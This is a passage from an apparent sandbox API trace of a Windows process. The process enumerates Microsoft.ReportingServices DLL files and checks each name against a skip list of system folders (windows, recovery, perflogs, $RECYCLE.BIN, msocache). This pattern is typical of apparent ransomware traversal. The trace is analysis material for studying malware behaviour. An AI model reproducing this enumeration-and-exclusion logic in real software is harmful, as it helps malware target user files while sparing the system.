lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.709] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6b61d36, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30878, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.ReportingServices.DataExtensions.dll", cAlternateFileName="MI8157~1.DLL")) returned 1 [0126.709] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.dll", lpString2=".") returned 1 [0126.709] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.dll", lpString2="..") returned 1 [0126.709] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.dll", lpString2="...") returned 1 [0126.709] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.dll", lpString2="windows") returned -1 [0126.709] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.dll", lpString2="recovery") returned -1 [0126.709] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.dll", lpString2="perflogs") returned -1 [0126.709] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.dll", lpString2="documents and settings") returned 1 [0126.709] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.709] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.dll", lpString2="system volume information") returned -1 [0126.709] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.dll", lpString2="msocache") returned -1 [0126.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0126.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.dll", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0126.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.dll", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.dll", lpUsedDefaultChar=0x0) returned 46 [0126.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0126.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0126.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.dll", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0126.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0126.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.dll", cchWideChar=46, lpMultiByteStr=0x22d298, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.dll", lpUsedDefaultChar=0x0) returned 46 [0126.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0126.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0126.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0126.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.709] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf18f9628, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf18f9628, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1726c0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.ReportingServices.Diagnostics.dll", cAlternateFileName="MIBCC9~1.DLL")) returned 1 [0126.709] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.dll", lpString2=".") returned 1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.dll", lpString2="..") returned 1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.dll", lpString2="...") returned 1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.dll", lpString2="windows") returned -1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.dll", lpString2="recovery") returned -1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.dll", lpString2="perflogs") returned -1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.dll", lpString2="documents and settings") returned 1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.dll", lpString2="system volume information") returned -1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.dll", lpString2="msocache") returned -1 [0126.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0126.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.dll", lpUsedDefaultChar=0x0) returned 43 [0126.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0126.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0126.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.dll", lpUsedDefaultChar=0x0) returned 43 [0126.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0126.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1ef7e0 [0126.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.710] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x91d3da7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x91d3da7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x97efe5f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfc60, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.ReportingServices.Interfaces.dll", cAlternateFileName="MI2DB2~1.DLL")) returned 1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2=".") returned 1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="..") returned 1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="...") returned 1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="windows") returned -1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="recovery") returned -1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="perflogs") returned -1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="documents and settings") returned 1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="system volume information") returned -1 [0126.710] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="msocache") returned -1 [0126.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0126.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Interfaces.dll", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0126.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Interfaces.dll", cchWideChar=42, lpMultiByteStr=0x22d260, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Interfaces.dll", lpUsedDefaultChar=0x0) returned 42 [0126.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0126.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0126.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Interfaces.dll", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0126.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Interfaces.dll", cchWideChar=42, lpMultiByteStr=0x22d0d8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Interfaces.dll", lpUsedDefaultChar=0x0) returned 42 [0126.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0126.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0126.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.711] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992fb3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992fb3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2283d0f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x886d8, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.dll", cAlternateFileName="MIB40B~1.DLL")) returned 1 [0126.711] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.dll", lpString2=".") returned 1 [0126.711] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.dll", lpString2="..") returned 1 [0126.711] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.dll", lpString2="...") returned 1 [0126.711] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.dll", lpString2="windows") returned -1 [0126.711] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.dll", lpString2="recovery") returned -1 [0126.711] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.dll", lpString2="perflogs") returned -1 [0126.711] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.dll", lpString2="documents and settings") returned 1 [0126.711] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.711] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.dll", lpString2="system volume information") returned -1 [0126.711] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.dll", lpString2="msocache") returned -1 [0126.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0126.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.dll", cchWideChar=53, lpMultiByteStr=0x20d920, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.dll", lpUsedDefaultChar=0x0) returned 53 [0126.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0126.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.dll", cchWideChar=53, lpMultiByteStr=0x20dba8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.dll", lpUsedDefaultChar=0x0) returned 53 [0126.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e110 [0126.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.712] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf19b820e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf19b820e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf19b820e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1faa68, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.ReportingServices.QueryDesigners.dll", cAlternateFileName="MIC718~1.DLL")) returned 1 [0126.712] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.dll", lpString2=".") returned 1 [0126.712] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.dll", lpString2="..") returned 1 [0126.712] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.dll", lpString2="...") returned 1 [0126.712] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.dll", lpString2="windows") returned -1 [0126.712] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.dll", lpString2="recovery") returned -1 [0126.712] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.dll", lpString2="perflogs") returned -1 [0126.712] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.dll", lpString2="documents and settings") returned 1 [0126.712] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.712] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.dll", lpString2="system volume information") returned -1 [0126.712] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.dll", lpString2="msocache") returned -1 [0126.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0126.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.dll", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0126.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0126.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.dll", cchWideChar=46, lpMultiByteStr=0x22d298, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.dll", lpUsedDefaultChar=0x0) returned 46 [0126.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0126.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0126.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.dll", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0126.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.dll", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.dll", lpUsedDefaultChar=0x0) returned 46 [0126.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0126.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0126.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0126.714] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0194432, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0194432, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0194432, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x36468, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.ReportingServices.ReportDesign.Common.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.714] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.dll", lpString2=".") returned 1 [0126.714] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.dll", lpString2="..") returned 1 [0126.714] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.dll", lpString2="...") returned 1 [0126.714] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.dll", lpString2="windows") returned -1 [0126.714] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.dll", lpString2="recovery") returned -1 [0126.714] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.dll", lpString2="perflogs") returned -1 [0126.714] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.dll", lpString2="documents and settings") returned 1 [0126.714] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.714] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.dll", lpString2="system volume information") returned -1 [0126.714] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.dll", lpString2="msocache") returned -1 [0126.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0126.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.dll", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0126.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.dll", cchWideChar=51, lpMultiByteStr=0x20dde8, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.dll", lpUsedDefaultChar=0x0) returned 51 [0126.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0126.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.dll", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0126.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0126.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.dll", cchWideChar=51, lpMultiByteStr=0x20d770, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.dll", lpUsedDefaultChar=0x0) returned 51 [0126.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e110 [0126.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0126.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.714] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6bfa6d9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6bfa6d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bfa6d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15868, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.dll", cAlternateFileName="MIBACB~1.DLL")) returned 1 [0126.714] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.dll", lpString2=".") returned 1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.dll", lpString2="..") returned 1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.dll", lpString2="...") returned 1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.dll", lpString2="windows") returned -1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.dll", lpString2="recovery") returned -1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.dll", lpString2="perflogs") returned -1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.dll", lpString2="documents and settings") returned 1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.dll", lpString2="system volume information") returned -1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.dll", lpString2="msocache") returned -1 [0126.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0126.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.dll", cchWideChar=50, lpMultiByteStr=0x0, 